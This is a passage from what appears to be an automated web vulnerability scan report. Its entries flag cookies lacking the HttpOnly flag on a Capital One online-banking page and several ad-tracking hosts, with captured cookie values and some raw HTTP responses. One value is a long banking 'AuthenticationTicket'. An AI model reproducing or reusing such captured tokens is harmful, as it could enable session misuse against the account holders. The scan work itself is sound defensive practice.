recs-6783b9b445294b239930e96e63a9d8bc="ssniaCEdLLCyT0VBCNucd96zW9hpo/RlpnaeJbVj5KbGy+og0xDlEssS2p5WMrQ7uXHTrjf+23TJhdbXU2M2CeiqZ6DT6sTTb0bge7ZGW1QxY4tiP17DbYybmwVWO1hZFKcUeOuwhgF5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 23-Jul-2011 13:53:24 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.156. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/OAO/initiation.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AuthenticationTicket=7E9AD15C6E2116D88D183D67C57A26C20820E54D245A0F8AE9840139E5BEF5ACCFCE3D1B7C44B021FEC9F130A4FEE27534778E3F63A7BBB4A0E9B46D87155881050AD326A5E1FEA27E77F2A92F11027DAFACABBA5E303B12279F104B5C246347A77571A7E5BF553780E182CEA81B9EC49B6B23AD7C1ABCC95C0A4DDA53B5CE8688AB3805777F777C4AD1123C339B404D0BCEB68C558A073F427B9AA2788AC4554799BD61BC6FF4A57B9D65FDFCF84BCC79ED17C0750A8769FF23C151F14BF9A99B0A1BBF7B7FCD6355DF8BFDE5D745DBFD0649E7F304781D462B7921; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.157. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BriligContact=cfda7676-9f21-4c86-b307-99e594c4e9e6; Domain=.brilig.com; Expires=Sat, 13-Jul-2041 18:43:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.158. http://pix04.revsci.net/A11149/a4/0/0/123.302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A11149/a4/0/0/123.302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m3VhBt3Axt0daA6gb/nRpMGg==; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:48:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.159. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4z+henIMH/C100a+jhgB5JQz9IZjavYaIGbgejnlu1LNx+p24I1oDZUR/PIEreL1khOld6I67wyCcvrDjgnPXWfftsVz6gi2U+R4C2HA1xNHMznYAaikEDYBtaPV2XgkSL49sR1LHELURF80qJ24YXWBjJG///bIMfJGqlOw4Z4AZ3CFoTpDon75FV/NMnS9d7+7BoPMcvYpkrNJjjSncbWRokElhKIqZ0wJF9tLA8AVKLKQnIom91GqEmtEhM5XY0AatgHAIlbu+jKhn7uSasiHr74K5PeGMCi1DXS91gFPiUVPN7NZjpaMjeUkVvvBEhtaCpyjQkkG9jLQQ3K8F9JXFdrzMA8MDWGlZ+Vju7e7eWtnHFWU3gOpKn7gPs31PEE1DiD2CZapLXs7AIbyuDDoWXF6ktBBStu0k56KlcXhvOA+mj6A6PgjB4ALyhPu3oeMTIALjZn3hx2WIVWWKybwlEZ10BC4K7+umeJXXurtrvh7lSNk2KhUazcIMzy7DuynwDAilMbbbmsoo4vojZLD0nQfSTwk4boSw0q2h3KsvO/zGi+l+gt/Wyw3bO7qyU6Ncw4h5TjyHLQOLJTDSgAx92fnqrLLEyJuCK4wlmsCrb6KROgq885iXyLw2iBH1f1Xz2vUmnkx3wgRyaUKX/L6O2NlT1599Fgobn/4FWXhjyVT6MUK1GdNbwalGQnmK2G/mWTUnr23ChWE5vMzJkLCyrpJF9qetK+qXvvwrzIJhHe9vRi9jbIrOuclFZP96Ajz7EXC3BMGtQpfo0uCHbmmgKh1; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:01 GMT; Path=/
udm_0=MLv3NzMJZjpn3hepL/sKOQzMPAgC9snnjELcqFbWhmRKTjkEarwaUQo9AQIc2HCTUsGSvg7FWc1FuYZjdc3F+16bIw7iBeJkNHcwDY154WjqYiYrsKNH4H1dy334j5gm5nSWh6u+GJ1X3wmqvojunnI5GoE7vEdN8KAD+4IgUpnKAaBCpxqXaQcl9qnb8OmIA4N+GstG9gmvg1EwKlcao2a4KpqrPAFBCfIz7tSr5mPwLkbDxlHpBCucior6IpWdhKtNyoy/88gXxj8uVMRW/Gh553T7eDk8VOVxE8UJJWdOX7p4qGhiCmfOHzFRhvKbvaqm+izgkMtH39Cch3LcT46U2NLrli0ewvymJU6mJYvahJvzgkDm5rt+1mkpQ+tOB4lSn/ZP7BRoT5knVtscyXaOaw0QTGGtvhyiltPuQhUn/iI8B1nXx1a5U7mlkzCTINROWxWb3e6xNnVLz3l2ak9ydVrN1jwtpswKUoPc7UBxKQT0cHinvn42TRKv9O4CieL8sgrPi/vCXu1Q13I5e62QGSfFQW+e1mvhOZwSnLECxdtefZKXR5jGRDOS9r2eK92BmHb/KGQtdUqP3v0gIz0/GPnZPS2m0Mw5/6/oA4kloLsdkdUWKyF45A31s4Gx/Ui0f0BK8gtigHxQ+KAcpHfdhlQZ3Gmkel8KNANjANV3WZS4FER1yBnZiQU4NgZDZdgTup7KYS+n5sVFcnqyAp82Bp/t+5gHRHbif44H6kBDey6tys8Znm4Sy8nzRr08sDVMi9vaodKux4gzJ4E1/VMC2SoiA8K/TXIij46AvltYt2wKBA9SOjyANGPxOgDxzX4zt/9H1QMydTyCdFyzkJ8p7Wl10PcblUXPqFXH8DqbgvCKOkeIqwk7OENLiCI/C4wnE3cYvdnM9QN8nYm9M9Oj4sQK+N5ow7Nesa0VGPGDd8S7gfLVr5E1mN497xp2rgs23SiNwGJM+S4Lf/nqLJz94Q2ooQpv4EGwK023hl2hjQXO1rb4dDIaify9MHWRnqay9hP9FpWTWj4SMmWalGeeTsDbHYckfFs97XBnMS5I8/lnC+bVOxZRYfQb/OId2njIq2AjyBNVJOMV/LWW3+eLaSr3NuHLxOEkcAH0FeVEO7GmsSHWzo0ObLc8sEWg/UpuMnaQfZIIXbi9nx2oES+Oy3J4qd53X9y5p/whPjwfkp4tYRaD6f/EDcBJ+ywWJqVTmXb/AWlYzQKE9BHTlsObIf3TRKh5s9/WcQeAXoVDXrOWxxfHWWSuDhA8GB+7ihZf1plL8rbOHPfmCIniQDfmE/1wVs1FuF3zNQuvFpwLFjz1iagCgq/TNqHIXeMUwQOmErB957UgSfbzaYZCBvOtTsA/Wz0Bw1ZdNLxbdXYMu+HDeW712rfJoYl9XYEon3pooXuoMuohTU9crJ/jjqLMiRxUuxG/7Kgd26dlxtxmqYl9UaJTUc2shrP6Jhi4cTogy1HbiJdfS6K5b9nXpMZoyE+aW0nEzLmvXKHNFQWw49neIQvdt8FotPwZSkHcoCedkD89b5wzCDwEBJYED2Dpp0K6Ca7oNaOtdvO7GrnXhvPw3JKzmkB20gj7MEHNb8jOR+ulgL6kEPuiW6sDAhZ40eiJ3JrVjvn4DTpfXGcgBRg5lUrD4mtyfjFnDCFuyeedSmFPo0xd4RAxioEVFdXRsx8lrgZwLJNDIXvKah5iX513JiE5+GA/Szm0X2DD6vuiDlHkzqxi8C+azXz9IuAn9Z9k00gHjGhrDzYSdvYimeF1M6dJ4aQPL4h0ICE5eGDfnejinVFdwbUrDZq2BnpYgZloN/DKzM/Hd9CZ5wswSCrXmiBjAtdi; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.160. http://pix04.revsci.net/G07608/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOhOAIMfzbhwEW4hpgx58EwQ6XJ4CPHPZPoktr5vw8bnoos/uNhWv/wPkIcMx/u6vH1A3WagFQk9HdSufRaWv3lncieJ5Uar6gijM+JLg7jdfeYKfugZxQVQy6oyTBw9EWjDSBB8v8jb65r0eeyWjePC1nNM3F9Uq187o0HW0axE8sAtySdh8flbc9fEe+ByFrfdr2P9O5m88mx/qMFsQg6JYmnz3Xh5hhfIdZ9KdwLdCo3ifHr2uAl7glBHZLy9Y/dF3nNf3m/tVO7I9B8jqfgOXo6hGSyD7+erFVtzxRrbRKTw0TA/QkUh2hwphhqfmni0/lyItG0Zz063E/r87yhw23ZcxAdOy4s5riEHFsW5joSbGno/lZnOey5M7uyjwm61OR51f8f7uruUJg3K5t2JKt3XwxV5g6C2ZvAKzBo1nwnukBaSO9LYymty6Tl+JzKzZX6S0Dniz99qrV3PVTTCAHg9gTLe276sJOGdewyfqgwceUztUNJmaXW4rwEJHcS9TgAyAHt/CSf+2rsOziBbqUC+9DI3fkARDvaEg2CvBFmct6E8Lo2S86B0JPt16OqrKDt1jeuMvYgXWfRe6+qdmhU3IhIm8R4QCXIp+1ZbTEoYE3ijpRkTuvj0cKzw4z5edHVGva0B5+pllchESdonBIIHYugT/tZhKv7M/CKZ3OwjZX/1ElV8nMa6C/vfi9M7WKkXM1T11yAo9Jt8vF/WK5aE1laUHeoBVk/TZNA4gxLLheN+aTb2tRrDRlvqrA101jcE/pLQNJgYU+rcOv4JS3E2PWi; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOhOAIMfzbhwEW4hpgx58EwQ6XJ4CPHPZPoktr5vw8bnoos/uNhWv/wPkIcMx/u6vH1A3WagFQk9HdSufRaWv3lncieJ5Uar6gijM+JLg7jdfeYKfugZxQVQy6oyTBw9EWjDSBB8v8jb65r0eeyWjePC1nNM3F9Uq187o0HW0axE8sAtySdh8flbc9fEe+ByFrfdr2P9O5m88mx/qMFsQg6JYmnz3Xh5hhfIdZ9KdwLdCo3ifHr2uAl7glBHZLy9Y/dF3nNf3m/tVO7I9B8jqfgOXo6hGSyD7+erFVtzxRrbRKTw0TA/QkUh2hwphhqfmni0/lyItG0Zz063E/r87yhw23ZcxAdOy4s5riEHFsW5joSbGno/lZnOey5M7uyjwm61OR51f8f7uruUJg3K5t2JKt3XwxV5g6C2ZvAKzBo1nwnukBaSO9LYymty6Tl+JzKzZX6S0Dniz99qrV3PVTTCAHg9gTLe276sJOGdewyfqgwceUztUNJmaXW4rwEJHcS9TgAyAHt/CSf+2rsOziBbqUC+9DI3fkARDvaEg2CvBFmct6E8Lo2S86B0JPt16OqrKDt1jeuMvYgXWfRe6+qdmhU3IhIm8R4QCXIp+1ZbTEoYE3ijpRkTuvj0cKzw4z5edHVGva0B5+pllchESdonBIIHYugT/tZhKv7M/CKZ3OwjZX/1ElV8nMa6C/vfi9M7WKkXM1T11yAo9Jt8vF/WK5aE1laUHeoBVk/TZNA4gxLLheN+aTb2tRrDRlvqrA101jcE/pLQNJgYU+rcOv4JS3E2PWi; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:00 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:30:59 GMT
Content-Length: 814

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
var rsinetsegs=['G07608_10001'];
var rsicsl="lA";
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiD
...[SNIP]...

11.161. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J08778/b3/0/3/1008211/347187000.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4j+hOnIMHvC1awMFwugmcrJaHuYbFIaoTm94OcJbus0+tJfl5DtqNncjloepKzHdqhGldyLRMA1tQMYTHbL5867W8dCvpsaWchbq2PgZ9rOgonmxYGukGTD98HHu2msY/8nZrAq1wjk7Aq5rzaF0xDEpbi58ks5EjT5XVcaOcbGFRFXsGSr2qZSKegvFKP6D1nFbXgAxHixzV4pVq15eibKHGM1xlc+/6LztD32WFA5XJPlLPCeJATHbBVsSaAHqSS0fnOoz2ZCApxjNobd+SbQ3/j3TuHcOCHAd2nIdNq0ntmY7NV2mPcNr4Wu+RNDwo8iULZBqqOnLx0cF2nA0o1sDZ7UwFDSGatqV0XbEszmxHgZAU9zQrqEIVfbn6W9PJtTnmZedOEDn6P0qJRmpgtv0zkF2IPOuJ2nsyplEJzvoi4pLHnFTAAcN759Tjjl1QPyWFenhl0IwocsV2UmopVVNZTcIt+vTdUWDd+7b+PNt8AZfK+9P4hmTFxFoavnUM2cQf/4pTYhWCiR0IgckYnxoxqMeMQc6/ZlCX4mX6lbXdigIpX/vawlIHMvrLl7CkMhK2Pcafun+5cLqweE9MPfltC1J296SlV1qfqRv8Et47sV4Tt9y4b/RBBdk6HAmQaHqUzmgICR5CFGL9rQObv1/Be6ac/78LQGI9EbvvlRREPDbTTUNBJeHOmZEZu06Y5g7wDb0xJtNf803HoRsFyXZgwq+CX/FAuBp+Ec2Lq5YGCeue0ezvUf8uEG6E3fs7wW1w/sIleuhX41J4LX01kbbIAeB05QlX1VI0KLHkEJwPw4=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:19:45 GMT; Path=/
NETSEGS_H07710=82f4957c1a652091&H07710&0&4e4fb471&5&10055,10027,10194,10204,10534&4e2a4063&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Sat, 20-Aug-2011 13:19:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4j+hOnIMHvC1awMFwugmcrJaHuYbFIaoTm94OcJbus0+tJfl5DtqNncjloepKzHdqhGldyLRMA1tQMYTHbL5867W8dCvpsaWchbq2PgZ9rOgonmxYGukGTD98HHu2msY/8nZrAq1wjk7Aq5rzaF0xDEpbi58ks5EjT5XVcaOcbGFRFXsGSr2qZSKegvFKP6D1nFbXgAxHixzV4pVq15eibKHGM1xlc+/6LztD32WFA5XJPlLPCeJATHbBVsSaAHqSS0fnOoz2ZCApxjNobd+SbQ3/j3TuHcOCHAd2nIdNq0ntmY7NV2mPcNr4Wu+RNDwo8iULZBqqOnLx0cF2nA0o1sDZ7UwFDSGatqV0XbEszmxHgZAU9zQrqEIVfbn6W9PJtTnmZedOEDn6P0qJRmpgtv0zkF2IPOuJ2nsyplEJzvoi4pLHnFTAAcN759Tjjl1QPyWFenhl0IwocsV2UmopVVNZTcIt+vTdUWDd+7b+PNt8AZfK+9P4hmTFxFoavnUM2cQf/4pTYhWCiR0IgckYnxoxqMeMQc6/ZlCX4mX6lbXdigIpX/vawlIHMvrLl7CkMhK2Pcafun+5cLqweE9MPfltC1J296SlV1qfqRv8Et47sV4Tt9y4b/RBBdk6HAmQaHqUzmgICR5CFGL9rQObv1/Be6ac/78LQGI9EbvvlRREPDbTTUNBJeHOmZEZu06Y5g7wDb0xJtNf803HoRsFyXZgwq+CX/FAuBp+Ec2Lq5YGCeue0ezvUf8uEG6E3fs7wW1w/sIleuhX41J4LX01kbbIAeB05QlX1VI0KLHkEJwPw4=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:19:45 GMT; Path=/
Set-Cookie: NETSEGS_H07710=82f4957c1a652091&H07710&0&4e4fb471&5&10055,10027,10194,10204,10534&4e2a4063&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Sat, 20-Aug-2011 13:19:45 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:19:44 GMT
Content-Length: 850

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs=['D08734_70056','D08734_70065','D08734_72011','D08734_72012','J08778_50019','J08778_50094'];
var rsiExp=new Date((new Date()).getTime()+
...[SNIP]...

11.162. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J08778/b3/0/3/1008211/435975349.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k9BenIMH/AtZKgq+hOCsvh2r2fpRbBYl2Is25RiGwqMDYAWq41oDVUZb5s2bNY/AmmMRNQ6G8l48fXlg9Xrw+FNDSHO9q1L1+BkttWCI9q3WOlMccnlFzHz5krI3kNoRr4zsR9PHELUWr6j2eeyIDePG5HF46KZvWSpE5vgBPDmqePnRBl5pX/5dVDNNnzZfdsUyegbfitG3bFhewaGHZHOVdqC8MveccUVUNc3tl8hXJCQ8dDYb+HMR42JSJOb+0fZI2nxYX+RPo+dZlyS1ZGjC1EFv3OU+T+pxCwU9zwK9Rwh/FVOZWH7hpZb7kAHKB79H5NzAKIgaqBHcCgwrnOqoKNEXhDFclPG5DcpD6Gd3pyndKPUdXpAPGv1dQDdr9C0Mhsfp6ZDPhEmIwyBGOzXsOU/tJKupuDcNfy+6SKBr/5yLwEHRBJ1Nhid+tnhxr1cGbfqFqdZhpPMqzlbIfigtTfG3rzMmHmZvJEhToiUuh6rECbVxTG1RvxvJ97CdAMK1XXHCEj3jnHVxZMeKMBBdoo+h8pKRJaEdoJYwLvB9XpAmwHKNx3xTWjNv2rvodhDx4Ic8+WGN9THFS1ZPclQI8smbO6QztWAuRBHUuiZa8X11N/rAwS02XuE2QoDnXSjj2sAFV0S6laoiwidnAT4a90ULID3cJbRSdoyH2kOkPL3mWWoqp+EkgmSjP+NyzyM+GY5TYwrX7IAgUvoFfFmpgN8q+qEq+ha57oqyyAM2NiqimY66v+hqAM2+/vhpPdLYq8JcoZi7VbgOe7sDUbpbp0PUOxMpm9PrAPx2KgZVuce8tuMvMuvwxpeH5aJiDhx5mXIV456Prc=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:43:27 GMT; Path=/
NETSEGS_J08781=82f4957c1a652091&J08781&0&4e4fb9ff&1&10277&4e2a33c4&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Sat, 20-Aug-2011 13:43:27 GMT; Path=/
rtc_Bnax=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; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:43:27 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.163. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J08778/b3/0/3/1008211/674742100.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOheXIMH/C100a+jhgB5JQz9IZjanZPl2IsG/pV+3rIIntSQUTo+UUZb5s27MW9jF1lux5Epha/fOLzjgnJUWffsMV36gi002R4C2GgV/NGMrnYqSklFjL3l0pIXGuyk4XPPxY08/+jqMWN48TRFTRcueLV467hvWTpMyhBzj0rOIR2oCGdh8clqm9Av5iPgQoKjXW8woAIDT65M74f1iSxPUUxkZ3hMMthX3w6BBFQ5rLyWXT98dOkOgh9TrOrW1Dh40eMrTNj0NUbw9FJhFRf7xWT9RhaYvvdsjYLg8R3fCP3NOEWdRBwv535UGK/UmS+FP1si+gHzj2CkqSCrRwp6YTjW07xSc4n2q4T3xufprHEBav+jShJQ8ZVcLKMFKbczRfzywzx5uybvUAmtS6vGrozUIPNthtP8S11pDb7oriwJZdi6MWeQ2bLflNpFOLjeOYr2kiFTwtv1OcKwLTo7Am+kcvTdUWDd2z2+fNtcF1fK+9PogOEy2nAWTCRH2+b6sNrva5rrOc8FyS8AjCljCRhv6VzF6npg4l6X/6UAlXoMwm7wntokLVnZ6TGiBjifl9duqZiaDHdadWNOQxjXUcm8U4zxCJApWUI5t/Z7HTA5ewGHxhwJELUvwIMVaa3EuS02h8bF1SluB+KtLRL//VtC66JJOvgvoWUYNDLdD4zbUnu5GUeI6C5nriJvWWlYEUoU558L7Mx+XQVgocNlRLwZ8eKM8uCBcYAFRz8zYy8q+StO2UPSbSYfTe1Y+quDNaYv9Z8ZKObpmSzSWipXzin6iBH8cO5OeOmZviMdhBznj3JifD+NeM1CI3kAuipJmROM/oSIAljbFnhisG2zcS37dZIlEgNQoXr; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:19:14 GMT; Path=/
NETSEGS_H07710=82f4957c1a652091&H07710&0&4e4fb452&5&10055,10027,10194,10204,10534&4e2a4063&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Sat, 20-Aug-2011 13:19:14 GMT; Path=/
